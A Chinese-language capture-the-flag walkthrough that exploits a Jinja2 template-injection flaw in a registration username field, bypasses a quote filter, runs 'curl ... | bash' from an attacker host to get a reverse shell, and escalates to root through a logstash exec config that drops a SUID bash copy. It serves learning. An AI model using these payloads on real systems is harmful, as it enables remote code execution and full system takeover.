端口扫描

nmap --min-rate=10000 -p- 10.10.194.47
Starting Nmap 7.93 ( https://nmap.org ) at 2023-12-07 12:14 UTC
Nmap scan report for ip-10-10-194-47.eu-west-1.compute.internal (10.10.194.47)
Host is up (0.027s latency).
Not shown: 65529 closed tcp ports (reset)
PORT      STATE SERVICE
7/tcp     open  echo
21/tcp    open  ftp
22/tcp    open  ssh
23/tcp    open  telnet
80/tcp    open  http
61337/tcp open  unknown
MAC Address: 02:0A:D4:98:3C:7F (Unknown)

Nmap done: 1 IP address (1 host up) scanned in 7.35 seconds
nmap -sT -sC -sV -O -p7,21,22,23,80,61337 10.10.194.47
Starting Nmap 7.93 ( https://nmap.org ) at 2023-12-07 12:15 UTC
Nmap scan report for ip-10-10-194-47.eu-west-1.compute.internal (10.10.194.47)
Host is up (0.017s latency).

PORT      STATE SERVICE VERSION
7/tcp     open  echo
21/tcp    open  ftp     vsftpd 3.0.3
22/tcp    open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 9e30c56192841b246486c33bb7dc9934 (RSA)
|   256 78c3c3838173cbf15041f19ad7bf3ed1 (ECDSA)
|_  256 ecceb8f957535663e961901215e5784a (ED25519)
23/tcp    open  telnet  Linux telnetd
80/tcp    open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.29 (Ubuntu)
61337/tcp open  http    Werkzeug httpd 2.0.1 (Python 3.6.9)
| http-title: Site doesn't have a title (text/html; charset=utf-8).
|_Requested resource was http://ip-10-10-194-47.eu-west-1.compute.internal:61337/login
|_http-server-header: Werkzeug/2.0.1 Python/3.6.9
MAC Address: 02:0A:D4:98:3C:7F (Unknown)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10 - 3.13 (95%), Linux 3.8 (95%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 2.6.32 (92%), Linux 2.6.39 - 3.2 (92%), Linux 3.1 - 3.2 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.25 seconds

Web

FTP没有匿名登录,23端口的telnet也需要凭证来进行登录。那就看下80端口,扫描了一下发现也只是简单的apache的默认页面,还有一个是61337的http端口口,是用python搭建的,而且房间提示template,大概率是有模板注入?访问并扫描一下目录

feroxbuster -u http://10.10.194.47:61337/ -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt

有一个可以访问的/temporary/dev/newacc目录,可以用于注册

用户名填个/{/{7*7/}/}看看,注册完之后登录,发现再Account界面是”欢迎49”说明username参数是存在SSTi的,虽然大概率是jinja2了,因为twig是PHP写的。但是保险起见,再注册个

/{/{7*’6’/}/}用户来验证发现好像被侦察到了,也许单引号是不被允许的。

直接去万能的PAYLOADALLTHING找了条超级无敌bypass,将单引号换成双引号就行,先开启个tcpdump

{{request|attr("application")|attr("\x5f\x5fglobals\x5f\x5f")|attr("\x5f\x5fgetitem\x5f\x5f")("\x5f\x5fbuiltins\x5f\x5f")|attr("\x5f\x5fgetitem\x5f\x5f")("\x5f\x5fimport\x5f\x5f")("os")|attr("popen")("ping -c 1 10.13.22.166")|attr("read")()}}

作为用户名,注册个账号,点进account,也是成功地收到了

Getshell

那么就能写一个反弹shell了

失算了,似乎&也被过滤了

那就写个脚本来上传让他执行

{{request|attr("application")|attr("\x5f\x5fglobals\x5f\x5f")|attr("\x5f\x5fgetitem\x5f\x5f")("\x5f\x5fbuiltins\x5f\x5f")|attr("\x5f\x5fgetitem\x5f\x5f")("\x5f\x5fimport\x5f\x5f")("os")|attr("popen")("curl http://10.11.38.245/rev | bash")|attr("read")()}}

直接受到反弹shell,身份是bill用户

提权

还有frankie,jenny,princess三个用户

在web.py中找到了连接数据库的凭证

temple_user/4$pCM!&bEEs$SR8H

但是似乎其他几个用户的家目录中都没什么东西

登进数据库,找到一个admin用户的密码哈希,但是破解不了

房间提示正在运行的进程

ps aux |grep "root"

发现root似乎在运行一个叫做logstash的java程序,似乎是服务器用来搜集信息用的程序

看下万能的hacktricks学习一下

https://book.hacktricks.xyz/linux-hardening/privilege-escalation/logstash

我们可以更改/etc/logstash/conf.d/logstash-sample.conf来执行命令

echo 'input {
  exec {
    command => "cp /bin/bash /home/bill/shell; chmod +xs /home/bill/shell"
    interval => 10
  }
}

output {
  file {
    path => "/tmp/output.log"
    codec => rubydebug
  }
}'>logstash-sample.conf

碎碎念

还算是比较简单的靶机吧,一共也就两个知识点,一个是ssti其实没什么难度,基本上什么过滤都可以直接找到现成的payload,logstash也是初接触,以及hacktricks真是个好东西